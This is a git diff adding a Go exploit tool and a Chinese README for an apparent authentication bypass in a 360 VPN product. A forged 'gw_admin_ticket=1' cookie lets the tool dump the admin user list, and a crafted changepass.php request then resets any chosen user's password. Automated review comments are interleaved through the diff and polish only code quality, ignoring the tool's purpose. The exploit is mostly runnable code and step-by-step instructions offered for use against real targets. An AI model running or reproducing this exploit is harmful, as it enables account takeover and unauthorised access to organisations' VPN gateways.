diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..723ef36 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +.idea \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..cf1fe3e --- /dev/null +++ b/README.md @@ -0,0 +1,54 @@ +# 1.**复现** + +1.使用cookie editor插件添加cookie值gw\_admin\_ticket为1. + +![](pics/1.png) + +2.使用charset插件修改网页编码为utf-8使页面正常显示 + +![](pics\2.png) + +3.获取到用户名信息. + +![](pics\3.png) + +4.使用hackbar对地址/changepass.php?type=2发送修改密码数据,并将cookie值修改为如下,this_name为你需要修改密码的用户名称. + +![](pics\4.png) + +![](pics\5.png) + +5.返回修改密码成功.可能会提示密码强度不够可以尝试随机生成字符串来生成。 + +![](pics\6.png) + +# 2.工具使用 + +1.下载对应系统版本工具 + +```shell +./VPN_linux_amd64 -h +Usage of /tmp/go-build2269393005/b001/exe/main: + -c check target vuln.(default) (default true) + -e change user's password. + -p string + manual set password you want change.(default is generate by random.) (default "BpLnfgDsc3WD") + -t int + request timeout default is 5 second. (default 5) + -u string + target you want fuck.(example:https://xxxxx:xxx) + +``` + +2.参数介绍 + +| 参数 | 含义 | +| ---- | ----------------------------------------------------- | +| c | 检测模块,默认启用,存在漏洞的话会输出目标的用户列表. | +| e | 修改密码模块,默认不启用. | +| p | 更改后的密码,默认随机生成. | +| t | 请求超时时间,默认为5s. | +| u | 需要检测的目标url地址,. | + + + diff --git a/build.sh b/build.sh new file mode 100644 index 0000000..ef1e3d8 --- /dev/null +++ b/build.sh 
@@ -0,0 +1,29 @@
+export LDFLAGS='-s -w '
+
+CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_linux_amd64 main.go
+CGO_ENABLED=0 GOOS=windows GOARCH=386 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_386.exe main.go
+CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_amd64.exe main.go
+CGO_ENABLED=0 GOOS=windows GOARCH=arm64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_windows_arm64.exe main.go
+CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_darwin_amd64 main.go
+CGO_ENABLED=0 GOOS=darwin GOARCH=arm64 go build -ldflags="$LDFLAGS" -trimpath -o VPN_darwin_arm64 main.go
+
+upx -9 VPN_linux_amd64
+upx -9 VPN_windows_386.exe
+upx -9 VPN_windows_amd64.exe
+upx -9 VPN_windows_arm64.exe
+upx -9 VPN_darwin_amd64
+upx -9 VPN_darwin_arm64
+
+zip VPN_linux_amd64.zip VPN_linux_amd64 config.yaml
+zip VPN_windows_386.zip VPN_windows_386.exe config.yaml
+zip VPN_windows_amd64.zip VPN_windows_amd64.exe config.yaml
+zip VPN_windows_arm64.zip VPN_windows_arm64.exe config.yaml
+zip VPN_darwin_amd64.zip VPN_darwin_amd64 config.yaml
+zip VPN_darwin_arm64.zip VPN_darwin_arm64 config.yaml
+
+rm -f VPN_linux_amd64
+rm -f VPN_windows_386.exe
+rm -f VPN_windows_amd64.exe
+rm -f VPN_windows_arm64.exe
+rm -f VPN_darwin_amd64
+rm -f VPN_darwin_arm64
\ No newline at end of file
diff --git a/go.mod b/go.mod
new file mode 100644
index 0000000..8a159a7
--- /dev/null
+++ b/go.mod
@@ -0,0 +1,11 @@
+module 360ConnectTool
+
+go 1.20
+
+require github.com/go-resty/resty/v2 v2.7.0
+
+require (
+ github.com/PuerkitoBio/goquery v1.8.1 // indirect
+ github.com/andybalholm/cascadia v1.3.2 // indirect
+ golang.org/x/net v0.10.0 // indirect
+)
diff --git a/go.sum b/go.sum
new file mode 100644
index 0000000..6a679bf
--- /dev/null
+++ b/go.sum
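Review bot: The script has no `set -e`, so when one of the six `go build` or `upx` invocations fails the later `zip` and `rm -f` lines still run and a stale or missing binary is packaged or quietly deleted; add `#!/usr/bin/env bash` and `set -euo pipefail` as the first two lines. Every `zip` line also bundles `config.yaml`, but nothing in this commit adds that file and, as far as the diff shows, nothing in main.go or module/ reads it, so on a fresh checkout the zip step fails or ships an untracked file — a comment stating where `config.yaml` is expected to come from would save the next person a guess. With `-e` in place, a missing `upx` on the build host would stop the script early rather than producing uncompressed archives, which is presumably the intent.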
@@ -0,0 +1,49 @@ +github.com/PuerkitoBio/goquery v1.8.1 h1:uQxhNlArOIdbrH1tr0UXwdVFgDcZDrZVdcpygAcwmWM= +github.com/PuerkitoBio/goquery v1.8.1/go.mod h1:Q8ICL1kNUJ2sXGoAhPGUdYDJvgQgHzJsnnd3H7Ho5jQ= +github.com/andybalholm/cascadia v1.3.1/go.mod h1:R4bJ1UQfqADjvDa4P6HZHLh/3OxWWEqc0Sk8XGwHqvA= +github.com/andybalholm/cascadia v1.3.2 h1:3Xi6Dw5lHF15JtdcmAHD3i1+T8plmv7BQ/nsViSLyss= +github.com/andybalholm/cascadia v1.3.2/go.mod h1:7gtRlve5FxPPgIgX36uWBX58OdBsSS6lUvCFb+h7KvU= +github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= +github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= +github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= +golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= +golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210916014120-12bc252f5db8/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20211029224645-99673261e6eb h1:pirldcYWx7rx7kE5r+9WsOXPXK0+WH5+uZ7uPmJ44uM= +golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= +golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= +golang.org/x/net v0.7.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs= +golang.org/x/net v0.9.0/go.mod 
h1:d48xBJpPfHeWQsugry2m+kC02ZBRGRgulfHnEXEuWns= +golang.org/x/net v0.10.0 h1:X2//UzNDwYmtCLn7To6G58Wr6f5ahEAQgKNzv9Y951M= +golang.org/x/net v0.10.0/go.mod h1:0qNGK6F8kojg2nk9dLZ2mShWaEBan6FAoqfSigmmuDg= +golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= +golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= +golang.org/x/term v0.5.0/go.mod h1:jMB1sMXY+tzblOD4FWmEbocvup2/aLOaQEp7JmGp78k= +golang.org/x/term v0.7.0/go.mod h1:P32HKFT3hSsZrRxla30E9HqToFYAQPCMs/zFMBUFqPY= +golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= +golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.7/go.mod 
h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= +golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= +golang.org/x/text v0.9.0/go.mod h1:e1OnstbJyHTd6l/uOt8jFFHp6TRDWZR/bV3emEE/zU8= +golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= +golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= +golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= +golang.org/x/tools v0.6.0/go.mod h1:Xwgl3UAJ/d3gWutnCtw505GrjyAbvKui8lOU390QaIU= +golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= diff --git a/main.go b/main.go new file mode 100644 index 0000000..4dc9afa --- /dev/null +++ b/main.go @@ -0,0 +1,7 @@ +package main + +import "360ConnectTool/module" + +func main() { + module.V.Run() +} diff --git a/module/init.go b/module/init.go new file mode 100644 index 0000000..83f2c3c --- /dev/null +++ b/module/init.go 
@@ -0,0 +1,36 @@
+package module
+
+import (
+ "flag"
+ "fmt"
+ "log"
+ "net/url"
+)
+
+var (
+ V vpnConnect
+ getUserListPath = "/admin/group/x_group.php?id=1"
+ changePasswordPath = "/changepass.php?type=2"
+ password string
+)
+
+func (v *vpnConnect) init() {
+ flag.StringVar(&v.target, "u", "", "target you want fuck.(example:https://xxxxx:xxx)")
+ flag.IntVar(&v.timeout, "t", 5, "request timeout default is 5 second.")
+ flag.BoolVar(&v.check, "c", true, "check target vuln.(default)")
+ flag.BoolVar(&v.change, "e", false, "change user's password.")
+ flag.StringVar(&password, "p", v.generatePassword(), "manual set password you want change.(default is generate by random.)")
+ flag.Parse()
+ v.isVul = false
+ if v.target == "" {
+ log.SetPrefix("[-] ")
+ log.Fatalln("give me a valid target url")
+ } else {
+ u, err := url.Parse(v.target)
+ if err != nil {
+ log.SetPrefix("[-] ")
+ log.Fatalln(err)
+ }
+ v.target = fmt.Sprintf("%s://%s", u.Scheme, u.Host)
+ }
+}
diff --git a/module/module.go b/module/module.go
new file mode 100644
index 0000000..bd95570
--- /dev/null
+++ b/module/module.go
@@ -0,0 +1,12 @@
+package module
+
+type vpnConnect struct {
+ target string
+ users []string
+ canGetUser bool
+ isVul bool
+ timeout int
+ check bool
+ change bool
+ cookie string
+}
diff --git a/module/utils.go b/module/utils.go
new file mode 100644
index 0000000..f851731
--- /dev/null
+++ b/module/utils.go
@@ -0,0 +1,28 @@
+package module
+
+import (
+ "fmt"
+ "math/rand"
+ "strings"
+)
+
+func (v vpnConnect) generatePassword() string {
+ charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
+ sb := strings.Builder{}
+ sb.Grow(16)
+ for i := 0; i < 12; i++ {
+ sb.WriteByte(charset[rand.Intn(len(charset))])
+ }
+ return sb.String()
+}
+func (v vpnConnect) showUserList() {
+ for k, v := range v.users {
+ fmt.Printf("%d.%s ", k, v)
+ if k == 0 {
+ continue
+ } else if k%8 == 0 {
+ fmt.Println()
+ }
+ }
+ fmt.Println()
+}
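Review bot: `v.check` is filled from the `-c` flag on the third `flag.BoolVar` line but is never read — `Run` in module/vpn.go calls `getUserList` unconditionally — so the "check module, enabled by default" switch the README documents is a no-op and the help text misleads; either gate the call with `if v.check { v.getUserList() }` or drop the flag. The `url.Parse` branch also lets a scheme-less target through: `url.Parse("host:8443")` returns an error, but `url.Parse("host")` succeeds with empty `Scheme` and `Host`, and the `Sprintf` then yields the base URL `://`, which only fails later inside the resty call; add `if u.Scheme == "" || u.Host == "" { log.Fatalln("target must be http(s)://host[:port]") }` before the `Sprintf`. `v.isVul = false` after `flag.Parse()` is redundant with the zero value and, as far as this commit shows, the field is never set to true or read anywhere, so a comment saying what it is reserved for (or removing it) would help. Naming the method `init` is legal but reads like the package-level `init` function; `parseFlags` says what it does.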
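Review bot: None of the eight fields carry a comment, and as far as this commit shows three of them are write-only: `check` is set in module/init.go and never read, `isVul` is set to false and never read, and `canGetUser` is set to true at the end of `getUserList` and never consulted, so they are either placeholders or dead state and a comment should say which. `timeout` is a bare int that vpn.go multiplies by `time.Second`; either document it as `timeout int // seconds; vpn.go converts to time.Duration` or store a `time.Duration` directly so a caller cannot pass milliseconds. `cookie` holds the value of the first cookie in the user-list response and is sent back by `changePassword` as `PHPSESSID`, which is worth stating next to the field since it is the only session state the struct carries.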
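Review bot: `generatePassword` draws from `math/rand` with no seed, so on toolchains before Go 1.20's automatic seeding every run yields the same 12-character string — the `-p` default `BpLnfgDsc3WD` shown in the README's help output is exactly what an unseeded `math/rand` produces over this alphabet — and even when seeded `math/rand` is not a cryptographic source; a credential that ends up on an account should come from `crypto/rand` (`rand.Int(rand.Reader, big.NewInt(int64(len(charset))))` per character), which also makes seeding moot. `sb.Grow(16)` reserves more than the 12 bytes the loop writes; use the loop bound. In `showUserList` the range variable `v` shadows the receiver `v` inside the loop body, which only works because `v.users` is evaluated once before the loop starts; rename it (`for k, name := range v.users`). The `if k == 0 { continue } else if k%8 == 0` pair can be a single `if k > 0 && k%8 == 0 { fmt.Println() }` with identical output and no `else` after `continue`.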
diff --git a/module/vpn.go b/module/vpn.go
new file mode 100644
index 0000000..190e1a8
--- /dev/null
+++ b/module/vpn.go
@@ -0,0 +1,89 @@
+package module
+
+import (
+ "crypto/tls"
+ "fmt"
+ "github.com/PuerkitoBio/goquery"
+ "github.com/go-resty/resty/v2"
+ "log"
+ "net/http"
+ "strings"
+ "time"
+)
+
+func (v *vpnConnect) getUserList() {
+ headers := map[string]string{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"}
+ headers["cookie"] = "gw_admin_ticket=1"
+ v.users = make([]string, 0)
+ client := resty.New()
+ client.SetHeaders(headers)
+ client.SetBaseURL(v.target)
+ client.SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true})
+ client.SetTimeout(time.Duration(v.timeout) * time.Second)
+ resp, err := client.R().Get(getUserListPath)
+ if err != nil {
+ log.SetPrefix("[-] ")
+ log.Fatalln(err)
+ }
+ dom, err := goquery.NewDocumentFromReader(strings.NewReader(string(resp.Body())))
+ if err != nil {
+ log.SetPrefix("[-] ")
+ log.Fatalln(err)
+ }
+ if !strings.Contains(string(resp.Body()), "用户信息") {
+ log.SetPrefix("[-] ")
+ log.Fatalln("target may secure.")
+ }
+ log.SetPrefix("[*] ")
+ log.Println("Try To Get Target's User List.")
+ dom.Find("#user_unsel > option").Each(
+ func(i int, selection *goquery.Selection) {
+ v.users = append(v.users, strings.Split(selection.Text(), "->")[1])
+ })
+ log.SetPrefix("[*] ")
+ log.Println("Target User List Got It.")
+ log.Printf("Target Have %d User.\n", len(v.users))
+ v.canGetUser = true
+ v.cookie = resp.Cookies()[0].Value
+}
+func (v *vpnConnect) changePassword() {
+ v.showUserList()
+ var index int
+ fmt.Print("[!] Give A Num of User That You Want To Change Password:")
+ fmt.Scanf("%d\n", &index)
+ log.SetPrefix("[*] ")
+ log.Printf("Trying To Change User %s's Password.", v.users[index])
+ headers := map[string]string{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded"}
+ headers["cookie"] = fmt.Sprintf(`PHPSESSID=%s;gw_user_ticket=ffffffffffffffffffffffffffffffff; user_lang_id=2; last_step_param={"this_name": "%s","subAuthId": "1"}`, v.cookie, v.users[index])
+ client := resty.New()
+ client.SetHeaders(headers)
+ client.SetBaseURL(v.target)
+ client.SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true})
+ client.SetTimeout(time.Duration(v.timeout) * time.Second)
+ body := fmt.Sprintf(`password=%s&repassword=%s&vcode=&old_pass=`, password, password)
+ resp, err := client.R().SetBody(body).Post(changePasswordPath)
+ if err != nil {
+ log.SetPrefix("[-] ")
+ log.Fatalln(err)
+ }
+ if resp.StatusCode() == http.StatusOK && strings.Contains(string(resp.Body()), "修改密码成功") {
+ log.SetPrefix("[!] ")
+ log.Printf("User %s's Password Change To %s", v.users[index], password)
+ } else {
+ log.SetPrefix("[!] ")
+ dom, err := goquery.NewDocumentFromReader(strings.NewReader(string(resp.Body())))
+ if err != nil {
+ log.SetPrefix("[-] ")
+ log.Fatalln(err)
+ }
+ log.SetPrefix("[!] ")
+ log.Fatalln(dom.Find(".main_font").Text())
+ }
+}
+func (v *vpnConnect) Run() {
+ v.init()
+ v.getUserList()
+ if v.change {
+ v.changePassword()
+ }
+}
diff --git a/pics/1.png b/pics/1.png
new file mode 100644
index 0000000..3c7a15c
Binary files /dev/null and b/pics/1.png differ
diff --git a/pics/2.png b/pics/2.png
new file mode 100644
index 0000000..c562299
Binary files /dev/null and b/pics/2.png differ
diff --git a/pics/3.png b/pics/3.png
new file mode 100644
index 0000000..364546c
Binary files /dev/null and b/pics/3.png differ
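Review bot: Three indexing expressions in this hunk panic on input the program does not control: `resp.Cookies()[0].Value` at the end of `getUserList` when the response sets no cookie, `strings.Split(selection.Text(), "->")[1]` inside the `Each` callback when an option's text contains no `->`, and `v.users[index]` in `changePassword` when the value from `fmt.Scanf` (whose error is discarded) is negative, out of range, or never parsed. Guard each before use: `if cs := resp.Cookies(); len(cs) > 0 { v.cookie = cs[0].Value }`, `if parts := strings.Split(selection.Text(), "->"); len(parts) > 1 { v.users = append(v.users, parts[1]) }`, and `if index < 0 || index >= len(v.users) { log.Fatalln("no such user index") }` directly after the Scanf. `InsecureSkipVerify: true` is hard-wired into both resty clients with no flag to turn it off, so a comment stating that certificate validation is intentionally disabled belongs on each `SetTLSClientConfig` line. `Run` never consults `v.check`, so the `-c` flag parsed in module/init.go has no effect on what runs.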
diff --git a/pics/4.png b/pics/4.png
new file mode 100644
index 0000000..56cf1ba
Binary files /dev/null and b/pics/4.png differ
diff --git a/pics/5.png b/pics/5.png
new file mode 100644
index 0000000..992551a
Binary files /dev/null and b/pics/5.png differ
diff --git a/pics/6.png b/pics/6.png
new file mode 100644
index 0000000..e2dda2d
Binary files /dev/null and b/pics/6.png differ